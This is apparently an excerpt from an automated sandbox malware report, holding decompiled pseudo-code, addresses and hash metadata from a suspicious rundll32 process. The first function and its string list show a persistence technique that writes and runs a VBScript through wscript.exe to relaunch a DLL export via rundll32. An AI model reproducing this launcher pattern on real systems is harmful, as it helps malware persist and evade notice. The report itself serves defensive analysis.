				_t222 = E0000021521520586A20(_t221, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t432 - 0x68)) + _t306,  *((intOrPtr*)(_t432 - 0x68)));
				if (_t306 != 0xffffffff) goto 0x20588450;
				E0000021521520586820(_t222, _t241, _t432 - 0x78);
				_t421 =  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50;
				_t368 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
				r8d =  *(_t432 - 0x40);
				E00000215215205CA9C8(_t306, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10,  >=  ?  *((void*)(_t432 - 0x50)) : _t432 - 0x50, _t430,  *((intOrPtr*)(_t432 - 0x68)));
				E00000215215205893D0(_t314, _t432 + 0x68, "wscript.exe /E:vbscript ", _t430, _t432, _t432 - 0x10,  *((intOrPtr*)(_t432 - 0x68)));
				E0000021521520586820(E0000021521520588900(_t241, _t314, _t432 - 0x10, _t306), _t241, _t432 + 0x68);
				_t372 =  *0x206832c8; // 0x0
				if (_t372 == 0) goto 0x2058850f;
				_t228 = CloseHandle(??);
				 *0x206832c8 = _t471;
				_t374 =  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10;
				E0000021521520586820(E0000021521520586820(E0000021521520586820(E0000021521520586820(E0000021521520586820(E0000021521520586820(E00000215215205CB510(_t228, _t189, _t314,  >=  ?  *((void*)(_t432 - 0x10)) : _t432 - 0x10, _t306), _t241, _t432 - 0x50), _t241, _t432 - 0x10), _t241, _t432 - 0x30), _t241, _t432 + 0x48), _t241, _t432 + 0x88), _t241, _t432 + 0x10);
				_t307 =  *((intOrPtr*)(_t432 - 0x80));
				if (_t307 - 0x10 < 0) goto 0x205885bd;
				_t381 =  *((intOrPtr*)(_t434 + 0x68));
				if (_t307 + 1 - 0x1000 < 0) goto 0x205885b8;
				if ((_t241 & 0x0000001f) == 0) goto 0x2058858b;
				0x205faadc();
				asm("int3");
				_t309 =  *((intOrPtr*)(_t381 - 8));
				if (_t309 - _t381 < 0) goto 0x2058859a;
				0x205faadc();
				asm("int3");
				_t382 = _t381 - _t309;
				if (_t382 - 8 >= 0) goto 0x205885a9;
				0x205faadc();
				asm("int3");
				if (_t382 - 0x27 <= 0) goto 0x205885b5;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *((long long*)(_t432 - 0x80)) = 0xf;
				 *(_t434 + 0x78) = _t471;
				 *((char*)(_t434 + 0x68)) = 0;
				if (_t314 == 0) goto 0x2058862f;
				if ( *(_t432 + 0x40) - _t314 - 0x1000 < 0) goto 0x2058861b;
				if ((_t237 & 0x0000001f) == 0) goto 0x205885ee;
				0x205faadc();
				asm("int3");
				_t312 =  *((intOrPtr*)(_t314 - 8));
				if (_t312 - _t314 < 0) goto 0x205885fd;
				0x205faadc();
				asm("int3");
				_t315 = _t314 - _t312;
				if (_t315 - 8 >= 0) goto 0x2058860c;
				0x205faadc();
				asm("int3");
				if (_t315 - 0x27 <= 0) goto 0x20588618;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x30], xmm0");
				 *(_t432 + 0x40) = _t471;
				return 3;
			}



















































                0x21520587ed0
                0x21520587ed0
                0x21520587ed0
                0x21520587ed0
                0x21520587ed8
                0x21520587edf
                0x21520587ee6
                0x21520587ef1
                0x21520587ef5
                0x21520587ef9
                0x21520587efd
                0x21520587f01
                0x21520587f04
                0x21520587f07
                0x21520587f0a
                0x21520587f0d
                0x21520587f10
                0x21520587f15
                0x21520587f18
                0x21520587f1c
                0x21520587f2a
                0x21520587f2f
                0x21520587f32
                0x21520587f32
                0x21520587f37
                0x21520587f40
                0x21520587f48
                0x21520587f4d
                0x21520587f52
                0x21520587f57
                0x21520587f5b
                0x21520587f63
                0x21520587f68
                0x21520587f70
                0x21520587f75
                0x21520587f88
                0x21520587f92
                0x21520587f9e
                0x21520587fa5
                0x21520587fb9
                0x21520587fbf
                0x21520587fc3
                0x21520587fce
                0x21520587fd4
                0x21520587fdd
                0x21520587fe2
                0x21520587fed
                0x21520587ff2
                0x21520587ff4
                0x21520587ff9
                0x21520587ffa
                0x21520588001
                0x21520588003
                0x21520588008
                0x21520588009
                0x21520588010
                0x21520588012
                0x21520588017
                0x2152058801c
                0x2152058801e
                0x21520588023
                0x21520588027
                0x2152058802c
                0x21520588035
                0x2152058803a
                0x2152058803f
                0x21520588047
                0x21520588049
                0x2152058804d
                0x21520588058
                0x21520588064
                0x2152058806b
                0x2152058807a
                0x21520588080
                0x21520588089
                0x2152058808d
                0x21520588092
                0x21520588097
                0x2152058809b
                0x2152058809f
                0x215205880a7
                0x215205880ab
                0x215205880af
                0x215205880c0
                0x215205880c6
                0x215205880ca
                0x215205880d4
                0x215205880de
                0x215205880ec
                0x21520588101
                0x2152058810c
                0x21520588114
                0x21520588120
                0x21520588127
                0x2152058812b
                0x21520588141
                0x2152058815f
                0x21520588164
                0x21520588178
                0x2152058817d
                0x21520588181
                0x21520588185
                0x2152058818d
                0x21520588191
                0x2152058819a
                0x2152058819e
                0x215205881ab
                0x215205881b0
                0x215205881bf
                0x215205881c5
                0x215205881c7
                0x215205881ce
                0x215205881d4
                0x215205881de
                0x215205881e3
                0x215205881e7
                0x215205881eb
                0x215205881f3
                0x215205881f7
                0x215205881fb
                0x2152058820c
                0x21520588216
                0x21520588221
                0x21520588234
                0x2152058823d
                0x2152058824b
                0x2152058825e
                0x21520588273
                0x2152058827e
                0x21520588280
                0x2152058828b
                0x21520588292
                0x21520588299
                0x2152058829b
                0x2152058829d
                0x215205882a4
                0x215205882b1
                0x215205882b6
                0x215205882c8
                0x215205882de
                0x215205882ee
                0x21520588316
                0x2152058831b
                0x21520588320
                0x21520588325
                0x2152058832e
                0x21520588333
                0x21520588339
                0x2152058834b
                0x21520588360
                0x2152058836b
                0x2152058836d
                0x21520588375
                0x2152058838e
                0x2152058839d
                0x215205883ac
                0x215205883b1
                0x215205883ba
                0x215205883bf
                0x215205883c5
                0x215205883c9
                0x215205883cd
                0x215205883d5
                0x215205883d9
                0x215205883dd
                0x215205883ee
                0x215205883f4
                0x215205883f8
                0x215205883fc
                0x21520588404
                0x21520588408
                0x2152058840c
                0x2152058841d
                0x2152058842c
                0x21520588435
                0x2152058843c
                0x21520588448
                0x2152058844a
                0x21520588450
                0x21520588459
                0x21520588470
                0x2152058847e
                0x2152058848f
                0x2152058849b
                0x215205884a1
                0x215205884af
                0x215205884bd
                0x215205884c2
                0x215205884c6
                0x215205884da
                0x215205884f1
                0x215205884f6
                0x21520588500
                0x21520588502
                0x21520588508
                0x21520588518
                0x21520588560
                0x21520588566
                0x2152058856e
                0x21520588573
                0x2152058857e
                0x21520588583
                0x21520588585
                0x2152058858a
                0x2152058858b
                0x21520588592
                0x21520588594
                0x21520588599
                0x2152058859a
                0x215205885a1
                0x215205885a3
                0x215205885a8
                0x215205885ad
                0x215205885af
                0x215205885b4
                0x215205885b8
                0x215205885bd
                0x215205885c5
                0x215205885ca
                0x215205885d2
                0x215205885e1
                0x215205885e6
                0x215205885e8
                0x215205885ed
                0x215205885ee
                0x215205885f5
                0x215205885f7
                0x215205885fc
                0x215205885fd
                0x21520588604
                0x21520588606
                0x2152058860b
                0x21520588610
                0x21520588612
                0x21520588617
                0x2152058861e
                0x21520588623
                0x21520588626
                0x2152058862b
                0x21520588651

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: FolderPathSpecial
                • String ID: "copy $"mkdir $.dll$.mbx$/E:vbscript $Set objShell = CreateObject("Wscript.Shell")objShell.Run "rundll32.exe my_application_path, LLBMPMUsqf"$cmd.exe /c $my_application_path$wscript.exe$wscript.exe /E:vbscript
                • API String ID: 994120019-2262109626
                • Opcode ID: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction ID: 92f15904107da15f9026db128adbbbf844cfb93e0208dd9b1db3b2e5fe568829
                • Opcode Fuzzy Hash: b2a2ead585b8c65e9c79336ff782dd2f481bb5d4a3e724b700016a1cd6d63441
                • Instruction Fuzzy Hash: D5228A33302E64D5EB10EB64D8487ED27A1FBA17A8F901651EE6957AEEDF38C584C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EB2BC Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 97%
                			E00007FFA7FFA535EB2BC(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __r9, long long _a8, signed long long _a16, signed int _a24) {
				void* __rdi;
				void* __rsi;
				void* _t28;
				intOrPtr _t38;
				void* _t40;
				void* _t42;
				void* _t47;
				void* _t48;
				void* _t51;
				signed long long _t56;
				void* _t64;
				intOrPtr* _t79;
				signed long long _t81;
				long long* _t82;
				intOrPtr* _t84;
				char* _t85;
				intOrPtr* _t86;
				char* _t87;
				void* _t88;
				char* _t89;
				void* _t90;
				intOrPtr* _t91;
				signed long long _t98;
				signed long long _t103;
				signed long long _t117;
				signed long long _t120;
				signed long long _t121;
				intOrPtr* _t124;
				void* _t126;

				_t79 = __rax;
				_a8 = __rbx;
				_t84 = __rcx;
				E00007FFA7FFA535EAA38(_t28);
				r14d = 0;
				_a16 = r14d;
				_t124 = _t79;
				_a24 = r14d;
				E00007FFA7FFA535EAAA0(__edx, _t79,  &_a16);
				if (_t79 != 0) goto 0x535eb4f5;
				E00007FFA7FFA535EAA40(__edx, _t79,  &_a24);
				if (_t79 != 0) goto 0x535eb4e0;
				_t98 =  *0x53755278; // 0x0
				_t56 = _t98;
				if (_t56 == 0) goto 0x535eb339;
				r9d = __rcx[_t98 - __rcx] & 0x000000ff;
				_t51 = __edx - r9d;
				if (_t56 != 0) goto 0x535eb331;
				_t81 =  &(__rcx[1]);
				if (r9d != 0) goto 0x535eb31c;
				if (( *__rcx & 0x000000ff) == 0) goto 0x535eb490;
				E00007FFA7FFA535E7E58(_t81, _t98);
				_t121 = _t120 | 0xffffffff;
				if ( *((intOrPtr*)(_t84 + _t121 + 1)) != r14b) goto 0x535eb345;
				E00007FFA7FFA535E7E98(_t81, _t121 + 2);
				 *0x53755278 = _t81;
				E00007FFA7FFA535E7E58(_t81, 0);
				_t103 =  *0x53755278; // 0x0
				if (_t103 == 0) goto 0x535eb490;
				_t122 = _t121 + 1;
				if ( *((intOrPtr*)(_t84 + _t121 + 1)) != r14b) goto 0x535eb374;
				E00007FFA7FFA535E7EF8(_t81, _t103, _t121 + 2, _t84);
				if (_t81 != 0) goto 0x535eb4cb;
				_t10 = _t81 + 3; // 0x3
				r13d = _t10;
				r9d = r13d;
				_t11 = _t81 + 0x40; // 0x40
				E00007FFA7FFA535F1998(_t51, _t81, _t84,  *_t124, _t11, __r9);
				if (_t81 != 0) goto 0x535eb4b6;
				_t64 =  *_t84 - r14b;
				if (_t64 == 0) goto 0x535eb3bf;
				_t85 = _t84 + 1;
				if (_t64 != 0) goto 0x535eb3b1;
				dil =  *_t85 == 0x2d;
				if (dil == 0) goto 0x535eb3ce;
				_t86 = _t85 + 1;
				E00007FFA7FFA535E8028(_t81, _t86, _t86, _t122 - 1, _t124, __r9);
				_a16 = _t81 * 0xe10;
				_t38 =  *_t86;
				if (_t38 == 0x2b) goto 0x535eb3eb;
				if (_t38 - 0x30 - 9 > 0) goto 0x535eb3f0;
				_t87 = _t86 + 1;
				goto 0x535eb3df;
				if ( *_t87 != 0x3a) goto 0x535eb441;
				_t88 = _t87 + 1;
				_t40 = E00007FFA7FFA535E8028(_t81, _t88, _t88, _t122 - 1, _t124, __r9);
				_a16 = _a16 + _t81 * 0x3c;
				goto 0x535eb414;
				if (_t40 - 0x39 > 0) goto 0x535eb41a;
				_t89 = _t88 + 1;
				if ( *_t89 - 0x30 >= 0) goto 0x535eb40d;
				if ( *_t89 != 0x3a) goto 0x535eb441;
				_t90 = _t89 + 1;
				_t42 = E00007FFA7FFA535E8028(_t81, _t90, _t90, _t122 - 1, _t124, __r9);
				_t117 = _a16 + _t81;
				_a16 = _t117;
				goto 0x535eb43b;
				if (_t42 - 0x39 > 0) goto 0x535eb441;
				_t91 = _t90 + 1;
				if ( *_t91 - 0x30 >= 0) goto 0x535eb434;
				if (dil == 0) goto 0x535eb44b;
				_a16 =  ~_t117;
				_a24 = _t81;
				if (_t81 == 0) goto 0x535eb475;
				 *((intOrPtr*)(_t126 - 0x14f68b40)) =  *((intOrPtr*)(_t126 - 0x14f68b40)) + (r14d & 0xffffff00 |  *_t91 != r14b);
				_t82 =  *((intOrPtr*)(_t124 + 8));
				 *_t82 = r14b;
				_t47 = E00007FFA7FFA535EAA30((r14d & 0xffffff00 |  *_t91 != r14b) - 0x48);
				 *_t82 = _a16;
				_t48 = E00007FFA7FFA535EAA20(_t47);
				 *_t82 = _a24;
				return _t48;
			}
































                0x7ffa535eb2bc
                0x7ffa535eb2bc
                0x7ffa535eb2cf
                0x7ffa535eb2d2
                0x7ffa535eb2d7
                0x7ffa535eb2de
                0x7ffa535eb2e2
                0x7ffa535eb2e5
                0x7ffa535eb2e9
                0x7ffa535eb2f0
                0x7ffa535eb2fa
                0x7ffa535eb301
                0x7ffa535eb307
                0x7ffa535eb30e
                0x7ffa535eb311
                0x7ffa535eb31f
                0x7ffa535eb324
                0x7ffa535eb327
                0x7ffa535eb329
                0x7ffa535eb32f
                0x7ffa535eb333
                0x7ffa535eb339
                0x7ffa535eb33e
                0x7ffa535eb34c
                0x7ffa535eb351
                0x7ffa535eb358
                0x7ffa535eb35f
                0x7ffa535eb364
                0x7ffa535eb36e
                0x7ffa535eb374
                0x7ffa535eb37b
                0x7ffa535eb384
                0x7ffa535eb38b
                0x7ffa535eb394
                0x7ffa535eb394
                0x7ffa535eb398
                0x7ffa535eb39b
                0x7ffa535eb3a4
                0x7ffa535eb3ab
                0x7ffa535eb3b1
                0x7ffa535eb3b4
                0x7ffa535eb3b6
                0x7ffa535eb3bd
                0x7ffa535eb3c2
                0x7ffa535eb3c9
                0x7ffa535eb3cb
                0x7ffa535eb3d1
                0x7ffa535eb3dc
                0x7ffa535eb3df
                0x7ffa535eb3e3
                0x7ffa535eb3e9
                0x7ffa535eb3eb
                0x7ffa535eb3ee
                0x7ffa535eb3f3
                0x7ffa535eb3f5
                0x7ffa535eb3fb
                0x7ffa535eb408
                0x7ffa535eb40b
                0x7ffa535eb40f
                0x7ffa535eb411
                0x7ffa535eb418
                0x7ffa535eb41d
                0x7ffa535eb41f
                0x7ffa535eb425
                0x7ffa535eb42d
                0x7ffa535eb42f
                0x7ffa535eb432
                0x7ffa535eb436
                0x7ffa535eb438
                0x7ffa535eb43f
                0x7ffa535eb444
                0x7ffa535eb448
                0x7ffa535eb454
                0x7ffa535eb459
                0x7ffa535eb46e
                0x7ffa535eb476
                0x7ffa535eb479
                0x7ffa535eb47f
                0x7ffa535eb484
                0x7ffa535eb489
                0x7ffa535eb48e
                0x7ffa535eb4a0

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: -$:$:$?
                • API String ID: 3440502458-92861585
                • Opcode ID: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction ID: 756c227052dadb24578371188295bad3d939e5f8e6516c62854f8c487d6c8fc2
                • Opcode Fuzzy Hash: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction Fuzzy Hash: 22E11532A2CB824EE764CF3194416B9276BFFC6784F4CA175EA4E62A95DF3CE4419700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E9EA0 Relevance: 19.9, APIs: 13, Instructions: 378COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _fdexp_fdlogpoly
                • String ID:
                • API String ID: 4114727879-0
                • Opcode ID: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction ID: 5f67408cdf0219c8606eb718ec710c0152b2bcaedf3093fcc1713914f08f279c
                • Opcode Fuzzy Hash: 2849e88e75b85d9acbfc01c0a23c984c94bd6e59bb1f6be8716bfb0e62402709
                • Instruction Fuzzy Hash: 31021626E28F4689F6229B3684410B96367AFEF344F1CE771ED4D324E5EF2CB545A600
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520613DE8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 366timeCOMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 95%
                			E0000021521520613DE8(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __r9, long long _a8, signed int _a16, signed int _a24) {
				void* __rdi;
				void* __rsi;
				void* _t26;
				signed char _t36;
				signed int _t38;
				void* _t40;
				signed int _t43;
				void* _t45;
				void* _t46;
				signed int _t60;
				signed char* _t67;
				void* _t75;
				intOrPtr* _t90;
				signed char* _t92;
				signed int* _t93;
				signed char* _t96;
				signed char* _t97;
				signed char* _t98;
				signed char* _t99;
				signed char* _t100;
				signed char* _t101;
				signed char* _t102;
				signed char* _t107;
				signed char* _t111;
				signed long long _t118;
				signed long long _t119;
				intOrPtr* _t122;
				void* _t134;

				_t90 = __rax;
				_a8 = __rbx;
				E0000021521520613D50(_t26);
				r14d = 0;
				_a16 = r14d;
				_t122 = _t90;
				_a24 = r14d;
				if (E0000021521520613DB8(__edx, _t90,  &_a16) != 0) goto 0x20614021;
				if (E0000021521520613D58(__edx, _t90,  &_a24) != 0) goto 0x2061400c;
				_t107 =  *0x20682f98; // 0x0
				_t67 = _t107;
				if (_t67 == 0) goto 0x20613e65;
				r9d = __rcx[_t107 - __rcx] & 0x000000ff;
				if (_t67 != 0) goto 0x20613e5d;
				_t92 =  &(__rcx[1]);
				if (r9d != 0) goto 0x20613e48;
				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0x20613fbc;
				E000002152152060A780(_t92, _t107);
				_t119 = _t118 | 0xffffffff;
				if (__rcx[_t119 + 1] != r14b) goto 0x20613e71;
				E0000021521520603D7C(_t92, _t119 + 2);
				 *0x20682f98 = _t92;
				E000002152152060A780(_t92, _t119 + 2);
				_t111 =  *0x20682f98; // 0x0
				if (_t111 == 0) goto 0x20613fbc;
				_t120 = _t119 + 1;
				if (__rcx[_t119 + 1] != r14b) goto 0x20613ea0;
				if (E000002152152060BDB0(( *__rcx & 0x000000ff) - r9d, _t92, _t111, _t119 + 2, __rcx) != 0) goto 0x20613ff7;
				_t10 =  &(_t92[3]); // 0x3
				r13d = _t10;
				r9d = r13d;
				_t11 =  &(_t92[0x40]); // 0x40
				if (E000002152152060E758(_t11, _t92, __rcx,  *_t122, _t119 + 2, __r9) != 0) goto 0x20613fe2;
				_t75 =  *__rcx - r14b;
				if (_t75 == 0) goto 0x20613eeb;
				_t96 =  &(__rcx[1]);
				if (_t75 != 0) goto 0x20613edd;
				dil =  *_t96 == 0x2d;
				if (dil == 0) goto 0x20613efa;
				_t97 =  &(_t96[1]);
				_a16 = E000002152152060BE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10;
				_t36 =  *_t97;
				if (_t36 == 0x2b) goto 0x20613f17;
				if (_t36 - 0x30 - 9 > 0) goto 0x20613f1c;
				_t98 =  &(_t97[1]);
				goto 0x20613f0b;
				if ( *_t98 != 0x3a) goto 0x20613f6d;
				_t99 =  &(_t98[1]);
				_t38 = E000002152152060BE3C(E000002152152060BE3C(_t11, _t92, _t97, _t97, _t120 - 1, _t122, __r9) * 0xe10, _t92, _t99, _t99, _t120 - 1, _t122, __r9);
				_a16 = _a16 + _t38 * 0x3c;
				goto 0x20613f40;
				if (_t38 - 0x39 > 0) goto 0x20613f46;
				_t100 =  &(_t99[1]);
				if ( *_t100 - 0x30 >= 0) goto 0x20613f39;
				if ( *_t100 != 0x3a) goto 0x20613f6d;
				_t101 =  &(_t100[1]);
				_t40 = E000002152152060BE3C(_a16 + _t38 * 0x3c, _t92, _t101, _t101, _t120 - 1, _t122, __r9);
				_t60 = _a16 + _t40;
				_a16 = _t60;
				goto 0x20613f67;
				if (_t40 - 0x39 > 0) goto 0x20613f6d;
				_t102 =  &(_t101[1]);
				if ( *_t102 - 0x30 >= 0) goto 0x20613f60;
				if (dil == 0) goto 0x20613f77;
				_a16 =  ~_t60;
				_t43 = r14d & 0xffffff00 |  *_t102 != r14b;
				_a24 = _t43;
				if (_t43 == 0) goto 0x20613fa1;
				if (E000002152152060E758(0x40, _t92, _t102,  *((intOrPtr*)(_t122 + 8)), _t119 + 2, _t134) == 0) goto 0x20613fa8;
				goto 0x20613fcd;
				_t93 =  *((intOrPtr*)(_t122 + 8));
				 *_t93 = r14b;
				_t45 = E0000021521520613D48(_t44);
				 *_t93 = _a16;
				_t46 = E0000021521520613D38(_t45);
				 *_t93 = _a24;
				return _t46;
			}































                0x21520613de8
                0x21520613de8
                0x21520613dfe
                0x21520613e03
                0x21520613e0a
                0x21520613e0e
                0x21520613e11
                0x21520613e1c
                0x21520613e2d
                0x21520613e33
                0x21520613e3a
                0x21520613e3d
                0x21520613e4b
                0x21520613e53
                0x21520613e55
                0x21520613e5b
                0x21520613e5f
                0x21520613e65
                0x21520613e6a
                0x21520613e78
                0x21520613e7d
                0x21520613e84
                0x21520613e8b
                0x21520613e90
                0x21520613e9a
                0x21520613ea0
                0x21520613ea7
                0x21520613eb7
                0x21520613ec0
                0x21520613ec0
                0x21520613ec4
                0x21520613ec7
                0x21520613ed7
                0x21520613edd
                0x21520613ee0
                0x21520613ee2
                0x21520613ee9
                0x21520613eee
                0x21520613ef5
                0x21520613ef7
                0x21520613f08
                0x21520613f0b
                0x21520613f0f
                0x21520613f15
                0x21520613f17
                0x21520613f1a
                0x21520613f1f
                0x21520613f21
                0x21520613f27
                0x21520613f34
                0x21520613f37
                0x21520613f3b
                0x21520613f3d
                0x21520613f44
                0x21520613f49
                0x21520613f4b
                0x21520613f51
                0x21520613f59
                0x21520613f5b
                0x21520613f5e
                0x21520613f62
                0x21520613f64
                0x21520613f6b
                0x21520613f70
                0x21520613f74
                0x21520613f7d
                0x21520613f80
                0x21520613f85
                0x21520613f9d
                0x21520613f9f
                0x21520613fa1
                0x21520613fa5
                0x21520613fab
                0x21520613fb0
                0x21520613fb5
                0x21520613fba
                0x21520613fcc

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: ?
                • API String ID: 3440502458-1684325040
                • Opcode ID: b8f6f4bd453aa2ffabf6e2e221d464ce7bf9b3bb3860973c7510e40774486b0d
                • Instruction ID: b9f88b97b987dc880846a6b96101ed5860e6882070f29c14027fe5d848f8c27d
                • Opcode Fuzzy Hash: b8f6f4bd453aa2ffabf6e2e221d464ce7bf9b3bb3860973c7510e40774486b0d
                • Instruction Fuzzy Hash: 2BE1D433601AB0CAEF749F31A8497DAABA1FFE4784F685155EE4A43B9DCB38D4418700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205940F0 Relevance: 15.4, APIs: 10, Instructions: 350timeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 51%
                			E00000215215205940F0(intOrPtr __edx, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t134;
				int _t139;
				long _t176;
				void* _t184;
				signed int _t191;
				signed int _t239;
				signed int _t244;
				void* _t245;
				signed int _t246;
				void* _t249;
				long long _t250;
				long long _t252;
				struct _CRITICAL_SECTION* _t253;
				intOrPtr* _t259;
				intOrPtr* _t261;
				long long* _t263;
				struct _CRITICAL_SECTION* _t264;
				intOrPtr _t269;
				signed int _t304;
				struct _CRITICAL_SECTION* _t313;
				void* _t314;
				long _t316;
				signed int _t318;
				signed int _t319;
				void* _t322;
				void** _t323;
				void* _t325;
				void* _t326;
				long _t338;
				LARGE_INTEGER* _t341;
				void* _t344;
				struct _CRITICAL_SECTION* _t346;

				 *((intOrPtr*)(_t325 + 0x10)) = __edx;
				_t323 = _t325 - 0x40;
				_t326 = _t325 - 0x140;
				_t323[2] = 0xfffffffe;
				 *((long long*)(_t326 + 0x190)) = __rbx;
				_t314 = __rcx;
				r15d = 1;
				r14d = 0;
				asm("lock inc esp");
				if (__eflags != 0) goto 0x205942a0;
				_t5 = _t314 + 0x60; // 0x61
				_t323[6] = _t5;
				EnterCriticalSection(_t346);
				_t323[8] = 1;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x30], xmm0");
				_t239 =  *(__rcx + 0x90);
				if (_t239 == 0) goto 0x20594198;
				_t269 =  *((intOrPtr*)(_t326 + 0x38));
				if (_t269 == 0) goto 0x20594179;
				 *(_t269 + 0x20) = _t239;
				goto 0x2059417e;
				 *(_t326 + 0x30) = _t239;
				 *((long long*)(_t326 + 0x38)) =  *(__rcx + 0x98);
				 *(__rcx + 0x90) = _t344;
				 *(__rcx + 0x98) = _t344;
				_t259 =  *((intOrPtr*)(__rcx + 0x88));
				if (_t259 == 0) goto 0x205941c7;
				 *((intOrPtr*)( *_t259 + 0x20))();
				if ( *((intOrPtr*)(_t259 + 8)) != 0) goto 0x205941b0;
				E0000021521520593FE0( *((intOrPtr*)(_t259 + 8)), __rcx, _t326 + 0x30, _t5, _t323);
				if ( *((long long*)(_t314 + 0x48)) == 0) goto 0x20594241;
				_t261 =  *((intOrPtr*)(_t314 + 0x88));
				if (_t261 == 0) goto 0x20594241;
				_t134 =  *((intOrPtr*)( *_t261 + 0x18))();
				if ( *((intOrPtr*)(_t261 + 8)) != 0) goto 0x205941f0;
				if (_t134 - 0x11e1a300 >= 0) goto 0x20594241;
				 *((long long*)(_t326 + 0x58)) =  ~_t134 +  ~_t134 * 4 +  ~_t134 +  ~_t134 * 4;
				 *(_t326 + 0x28) = r14d;
				 *(_t326 + 0x20) = _t344;
				r9d = 0;
				r8d = 0x493e0;
				SetWaitableTimer(_t344, _t341, _t338);
				_t304 =  *(_t326 + 0x30);
				if (_t304 == 0) goto 0x20594297;
				_t244 =  *(_t304 + 0x20);
				 *(_t326 + 0x30) = _t244;
				_t277 =  ==  ? _t344 :  *((intOrPtr*)(_t326 + 0x38));
				 *((long long*)(_t326 + 0x38)) =  ==  ? _t344 :  *((intOrPtr*)(_t326 + 0x38));
				 *(_t304 + 0x20) = _t344;
				 *(_t323 - 0x10) = _t244;
				 *(_t323 - 8) = _t244;
				 *_t323 = _t344;
				r9d = 0;
				 *((intOrPtr*)(_t304 + 0x28))();
				if ( *(_t326 + 0x30) != 0) goto 0x2059424e;
				LeaveCriticalSection(_t313);
				_t323[0x22] = r14d;
				_t323[0x20] = _t344;
				 *(_t326 + 0x60) = _t344;
				SetLastError(_t316);
				 *(_t326 + 0x20) =  *(_t314 + 0x40);
				_t139 = GetQueuedCompletionStatus(_t322, ??, ??, ??);
				r14d = GetLastError();
				_t263 =  *(_t326 + 0x60);
				if (_t263 == 0) goto 0x2059444a;
				E000002152152058F380( *((intOrPtr*)(_t314 + 0x28)),  &(_t323[0x22]));
				_t318 = _t244;
				 *(_t326 + 0x40) = _t244;
				 *(_t326 + 0x48) = _t244;
